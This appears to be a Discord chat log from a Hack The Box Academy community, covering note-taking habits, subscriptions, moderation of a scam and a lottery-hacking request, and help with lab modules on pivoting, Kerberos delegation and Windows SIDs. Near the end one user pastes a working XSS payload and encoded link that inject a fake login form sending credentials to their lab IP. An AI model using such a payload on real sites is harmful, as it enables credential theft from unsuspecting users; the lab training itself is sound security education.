Documentation and Reporting, yes

Oh, okay, got it.

AEN itself is the walkthrough for itself

that's why it's recommended to do it blind

there's a neat trick where copying stuff from vscode into msword will retain the font, highlighting and even the theme, so I just do that

notes on the engagement is is obsidan, then final report is in ms word, so just transfer them around

The Object > Open Document trick?

I see. I was thinking of doing the same.

no just directly copy from vscode to msword, you can give it a try

What in the world kinda format is this? I was trying to grep '@inlane' the output of kerberos.

Oh ok.

If you don't mind answering, what's your personal folder structure preference when notetaking on an assessment? Do you create a folder for each host?

@fathom pendant what should I tag the #1234357888114364508 as?

target error

nah thre can be hundreds of hosts, I gorup them by findings, similar to of the report template actually

By findings? How do you mean?

special characters use to add highlighting to your terminal, you can use ansifilter to remove them

check the report template

findings/vulnerabilites

I don't see that section?

technical findings details

Technical Findings

Ohh, okay.

Attacking web applications with ffuf
Value Fuzzing

seems that everything is accepted, however when i try to use that as one of the ID it claims the ID is invalid

sounds like you need to filter a size

yes but when i filtered for 768

the ID wasn't correct

holdon actually

also delete this since it's spoiler

got it

@fathom pendant done it :D

gg

whaaat

i cant progress on different paths because of my lack of cubes

do i have to pay for subscription or something?

Do you use Obsidian's Canvas feature or something to keep track of your attack path during an engagement?

I'm currently struggling in coming up with a way to keep track of what I've done in an engagement. I'm assuming the Documenting module will cover that?

yes

I use the excalidraw plugin, but I haven't found making diagrams helpful even for complex stuff, usually just a descriptive heading and reading the commands will do but YMMV

damn bru

a sacrifice to learn

hell yeah

you can also give people your referral link

they have to purchase a subscription though for you to get cubes

only its like 20eu instead of 16 taxes go crazy

So the method you primarily use is multiple note files linked to one-another. A note file representing one finding/vulnerability?

good to know thank you

nope I just use one file for one engagement with different heading levels for different things, but this is really down to preference

Some sort of plugin you use to have a bird's eye view of the headings? Cuz I imagine the file can get quite long.

I'm still exploring ways, so don't have many preferences set yet. Tryna hear what people use, and then test and combine those ways to find my own.

you can see the headings in the right sidebar

Really? It doesn't show for me in Obsidian.

Holy, I never noticed it... Thanks 😂

I've noticed Heading 1 doesn't show, why is that?

Is it considered to be Title?

it does for me

Sorry, I missed the message. Can I DM u??

Have you posted the script anywhere?

Hello, may I ask why my PWNbox cannot be opened?

Have you tried refreshing?

Sorry, I didn’t understand the meaning of refreshing, but I tried restarting the web page and exiting the browser

yeah restarting the web page is refreshing it

Flush your cookies and tries again

I have not, it was a real pain to write so I'd just use it for myself

<@&861185840277487616> spam in all channels

Stop breaking rules Marcie

😚

Thank you, I cleared the cookies and can enable them

Can Pwnbox save its own content? I remember that it can save some of the user's content.

ive done my first ever hack with metasploit (on cracking HTB path)
im very proud

do i call myself a hacker now?

no we call you skid

Does anyone know what the purpose of using dnscat2 was in the module on Pivoting, Tunneling, and Port Forwarding, specifically in the section on DNS Tunneling with Dnscat2? I was able to get the flag without creating a session with dnscat2

nice
feels good

wait is skid like the lowest
skid as in beginner/new/baby in this, type shit?

script kiddy

ye i know

idk how to explain it though

Not for Academy, or at least not much

Skid means you run scripts without knowing what they do

Then complain when your copy/paste doesn't work without reading the error

ye ye i mean
am i one level above from before

thats what i meant
or i still dont know how to explain it

OH
was i a skid from the very beginning or nah
those are noobs or something less

type

No

dang

Hi there in AD skills assessment part 2 I'm on SQL01 with system level privileges, I would like to transfer some file in the parrot os attack box with smbserver, I think I had setup properly infact when I copy the files I received connection received with the relative hash but the file are not transfered in my parrot box, what can possibly be the problem?

What academy module is this related to

Read #rules and #welcome

d4rkcr4ck3r is a scammer guys take care of him

Of its someone ransom dming you message a mod/admin

ping him

or better yet hack him

Seems they aren't in the server (or mobile is being dumb)

This isn't a revenge hacking server

Yeah i know

I am just telling whoever is here that’s all

We genuinely don't care

Thank you

Idk what you expected out of "take care of him"

Take care not to scam anyone

Just ignore and report

No

lmao

Since it seems unrelated to HTB, and seems sus af I'm declining

Yeah you're trying to hack a fucking lottery system you nonce

It's not even a shitty web challenge

<@&861185840277487616> literally wants help to hack a lottery

did you have to download another wordlist or is the wordlist mentioned in the modules/on pwnbox

Fucking NO read the #rules you're literally asking do something illegal

just the defalt wordlists, if you get no resits then move on

I could use those winning numbers. I’d give you all a free tier 4 module

😅

Im good lmao

yessirrr subscription

is the host needed to get further into the network

if i cancel my subscription will it stay active until the end of the month?

because i can only see three hosts, one that i have system on, this one, and the domain controller

It'll stay active until the next billing cycle

oh good

So whenever it would renew the next time

Guys i get access to the flag in SOCKS5 Tunneling with Chisel module Pivoting, Tunneling, and Port Forwarding , but it says that the flag is wrong, could it be that someone altered the flag by mistake?
The question of the module is this one>
Using the concepts taught in this section, connect to the target and establish a SOCKS5 Tunnel that can be used to RDP into the domain controller (172.16.5.19, victor:pass@123). Submit the contents of C:\Users\victor\Documents\flag.txt as the answer.

ye i got you thnk you

Flags can't be altered by other users

Should i open a ticket?

It starts with H and ends with !

Make sure no additional spaces or anything like that

Bro.... My mistake, i was entering the wrong flag

You're likely looking in the wrong place then

Wait

Wrong section I'm looking at

It starts with T and ends with !

Sorry, my bad lol

I'm used to people getting stuck on the double pivot section of this module

Yup, i was looking in the wrong place :c

Hello, in the final part of the Windows Fundamentals module there's a question asking to get the SID of a user you create manually. Aren't SIDs unique? I've tried everything and I always get it wrong

maybe try this? https://www.lifewire.com/how-to-find-a-users-security-identifier-sid-in-windows-2625149

SIDs are unique in that two users will not share the same SID. But just because each user has their own SID, does not necessarily mean the SID is impossible for us to find 😉

Yep, did exactly that. Everything lines up for the first part (S-1-5-21) as in the hint, but still counts as incorrect.

can you show me?

i got "S-1-5-21-2614195641-1726409526-3792725429-1004", copy pasted that but it's incorrect

okay but where are you getting that from?

wmic useraccount get name,sid in powershell

can you show me a screenshot?

any chance you created a new user and then deleted them ?

I think i did

yep thats the problem . Respawn the target machine, make a new user named jim, and then run that command

alright, tyvm!

There actually is a science behind it

It's not wholly random

yes i ended up using the extraSIDS attack yesterday to pwn a parent domain

feelsgoodman

Congrats! I searched about exactly that, and a couple sites said it was all RNG. Interesting, thank you guys

nice work 😉

Admins 5xx, users 1xxx at the end

and everytime we add a new user, the corresponding SID goes up incrementally

Which is why it's extra important to trim dead SIDs

Proper user management

Oi <@&861185840277487616> they're back

I would like to ask why I use xfreerdp /u:administrator /p:'xxxx' /v:10.129.xx.xx. After a few clicks, the entire target becomes invalid. I cannot ping directly and cannot operate anything. regenerate

Try switching vpn regions

If it's consistent regardless of vpn region, message support

depending on the lab , you may need to give the target a few minutes to fully boot up

Doing Kerberos Attacks:Constrained Delegation from Linux and I got the following error

anyone has any idea why this could happen ?

I am working on the phishing section of the CROSS scripting module and I don't know what I am doing wrong:
The link to the module and the question:

https://academy.hackthebox.com/module/103/section/984

"Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag. "

The payload I generated after sending this command ||(document.write('<h3>Please login to continue</h3><form action=http://10.10.15.204><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');)|| to the 'Online Image Viewer' imput of this link(http://10.129.127.112/phishing/index.php):

||http://10.129.127.112/phishing/index.php?url=document.write('<h3>Please+login+to+continue<%2Fh3><form+action%3Dhttp%3A%2F%2F10.10.15.204><input+type%3D"username"+name%3D"username"+placeholder%3D"Username"><input+type%3D"password"+name%3D"password"+placeholder%3D"Password"><input+type%3D"submit"+name%3D"submit"+value%3D"Login"><%2Fform>')%3B||

And then when I try to execute the above command (after creating the index.php file that contain my Machine IP address and issuing the command ||sudo php -S 0.0.0.0:8181|| on pwnbox) in the input box on this link(http://10.129.127.112/phishing/send.php) I get the 'Issue in sending URL!' error

for INTRODUCTION TO DIGITAL FORENSICS - Skills Assessment, we are supposed to run Velociraptor collections and download CSV and JSON files? How are we to analyze these, I see we have no python or other tools. Just open them up and manually sift through them?

this might be a dumb question, but you have DC01 added to your hosts file right?

this might be a dump answer, I did add DC01 added to my hosts file

maybe try using describeTicket.py against your ccache file?

https://github.com/fortra/impacket/blob/master/examples/describeTicket.py

I will see, thank you for the suggestion

everything looks right.. is your impacket updated to the most recent version?

Specify port with your ip

port for which IP ?

10.10.15.204:8181

yes, I removed the old one and installed it again

but i don't believe it's from impacket, since NetExec shows similar error

I still get the same issue:

Isn't the port for both the php command and the port for the home IP address suppose to be the same?
|| sudo php -S 0.0.0.0:8081

document.write('<h3>Please login to continue</h3><form action=http://10.10.15.121:8081><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');||

Try to close java script

i remember crackmapexec using a ton of impacket libraries, so i suspect netexec probably has similar dependencies. I just worked through the lab on my end , feel free to DM if you want to compare notes.

the errors are related to authentication, looks like you have a ccache file with bad creds or creds that can't auth against the target

yea, we can't see what he entered for beth.richards password... but i can see he is using impacket v 0.9.19, when on my end i'm using v0.11.0

[HTTP ATTACKS - HTTP RESPONSE SPLITTING]
Hey guys!
Currently working on question of this section. My payload worked for user, but still struggling with admin.
Can I have a nudge?

same error occurs even with new version on impacket

Thanks that fixed it

that will be great

That error means invalid creds

but the creds are not a part of the attack, I am passing a ticket to authenticate with